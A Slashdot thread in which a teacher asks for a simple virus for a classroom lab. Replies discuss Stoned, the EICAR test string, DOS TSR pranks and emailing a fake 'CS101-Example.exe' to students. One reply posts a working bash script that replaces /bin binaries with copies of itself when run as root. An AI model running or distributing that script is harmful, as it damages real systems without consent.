Simple Virus For Teaching?

ed1023 writes "Currently I am teaching a 101 class on computers. It is more of a 'demystifying the black box' type of class. The current topic is computer viruses; I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions? Is there an executable out there that would work, or do I try to write one myself, or is there one that is written that I can compile myself?"

Stoned

[PacoSuarez]

Stoned is a classic and a pleasure to disassemble. It fits in a boot sector (512 bytes) and it's not particularly malicious, but it has all the elements that a virus needs. I don't know if it would still work on a modern computer, though: Some old viruses used funky instructions that became obsolete (like "POP CS"), and this one seems to have issues working on large-capacity disks.

Try this instead.

[neiras]

What do you expect a student to learn from being told "there is a virus on this machine, remove it by hand"?

If they are in the "demystifying the black box" phase, they have no idea what you're talking about.

Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose. Give them an overview of how a machine or user might be tricked into running malicious software. Teach them about how malicious software might propagate. Use historical examples. Talk about privileges.

Virus is a slang term that brings up all kinds of scare reactions in ordinary people. They immediately assume that machines are vulnerable to bacteria floating around on the wind, or something similar. You need to de-emphasize the term "virus". It's just software. Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

Write a simple program that copies itself to the Windows folder and starts itself at boot. The program should show an alert box saying "HACKED BY PROFESSOR HANDSOME!!!!" if it sees it is being run from the Windows folder. Put it on a USB key with an autorun.ini, tell them you have placed a virus you wrote on there, and let them sort it out. Just be sure you're on an XP machine and that autorun is enabled.

Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

Re:EICAR

[moonbender]

The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.

Wow, that's pretty cool. Here's the string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Re:What OS? And how annoying?

[arth1]

If Linux (or similar), here's an example of a worm that spreads itself on the local host whenever executed as root:

#!/bin/bash
 
if [ -O /bin/su ]; then
  mkdir -p /bin/.infected
  TARGET="/bin/ls"
  if [ -e /bin/.infected/ls ]; then
    TARGET=$(for i in $(find /bin -type f -prune); do
      echo 0$RANDOM $i
    done | sort | head -1 | cut -d' ' -f2-)
  fi
  if [ ! -e /bin/.infected/$(basename $TARGET) ]; then
    mv $TARGET /bin/.infected/
    cp $0 $TARGET
  fi
fi
ME="$(basename $0)"
if [ -x /bin/.infected/$ME ]; then
  PATH=/bin/.infected:$PATH
  $ME $*
  if [ $RANDOM -gt 30000 ]; then
    echo "Something wonderful has happened ... your machine is alive"
  fi
fi

Save as "virus"
chmod +x virus ./virus
rm -f virus

Re:Fake it.

[Internalist]

+5, Informative?...REALLY?!?...

OK, let's start with a handily recent post on the Language Log about Latin plurals (the post is about "syllabus", but "virus/viruses/*viri/**virii" show up in the comments).

Now, onward...

Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water".

Actually (and ignoring the somewhat startling categorisation of computer virus as "substance"), not in the same way at all. You can't call a single molecule of water "a water" because "water" is a mass noun in English, and those don't (i) take indefinite articles, and (ii) don't pluralize nicely (inter alia). It's possible that this portion of your argument comes from here, which points out that in Latin, "virus" ("poison") was a mass noun. Of course, in English, "virus" is very clearly a count noun in English, since it can be (and overwhelmingly is) used with an indefinite article.

Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs".

You appear in the preceding to be claiming that the word "virus" doesn't exist in English (or perhaps simply that is has no referent) a claim some information security researchers (and doctors!) might take issue with (cue lambasting for the stranded preposition in 3...2..1).

That being said, this raises an interesting point about...something. Maybe the type/token distinction? When someone says "I wrote a virus", we take him (or her, I suppose) to be making a claim about an implementation of some specific algorithm in some specific language, but not to any particular token of it.

The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, [...]

I don't understand the grounds on which you're making this claim.

[...] which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states,

OK, so the "running program, and its data" counts pretty much as a "single token of the substance" at hand, in my book. So now it sounds like you're contradicting your opening claim.

but I'm pretty sure nobody much thinks of it that clearly when using the word "virus".

As I just mentioned, you seem to be contradicting yourself (although I may just be misreading you), so you'll forgive if I take claims of clear thinking only quasi-seriously.

Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) [...]

Why is this 'incorrect'? "I wrote a virus. I'm calling it Johnny5." Seems like a perfectly good use of "a virus" to me.

[...] but only to an instance of that type of virus as it is spreading, [...]

Again, isn't this in contradiction to how you started this comment?

or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

Aside from the impossibility of "some arbitrary subset" of an instance (I'll assume that was just a typo/thinko), now you're just engaged in verbal wankery. I mean, I suppose you might choose to model the spread of contagion in a network of computers as the flow of a kind of flu

Re:What OS? And how annoying?

[ArsenneLupin]

Another fun prank from the DOS days: A TSR program that hooked in the keyboard interrupt, and if it detected that it was called from Turbo Pascal, and that the sequence for compilation was called, it would locate the editor buffer and randomly change a couple of semicolons to colon.

This was both annoying as hell (plenty of syntax errors), and difficult to positively blame on mischief as:

• Colon and semicolon are on same key, so easy to blame on typo (phat phingered the shift key)
• On those crappy monitors that we used back then, it was really difficult to tell colon and semicolon apart

The TSR was called <shift-space>.com and so a cursory perusal of the autoexec.bat would not reveal its presence, as shift-space just looks like a normal space (... but can be the name of a command)

IT spend an entire day trying to re-install Turbo Pascal, and the problem still persisted... (because it was in an independent TSR, not in the Turbo Pascal app itself)

Then, the next day, re-install of the entire system.

Another fun TSR one was the annoying keyboard beep. The TSR had a timetable of the classes build in, so that the keyboard click would be very short and almost unnoticable at the beginning of the class, and then gradually grew longer and longer during the class (first a faint click, than a more obvious click, and by the end of the hour an annoying beeeeeeeeeep). Fun thing is, as it was gradual, nobody really noticed when/how it started, but eventually that background noise was "just there"...

A, those were the days of highschool pranks...

how to write teh virus???

[rve]

On any tech forum, including slashdot, you have wannabe haxx0rz who ask "how to write teh virus???" They never get a serious answer, obviously.

The OP (ed1023) thinks he can trick slashdot readers with some social engineering into thinking they're really helping someone this time by telling him "how to write teh virus???". Who knows, maybe he will succeed. Maybe he will write teh virus.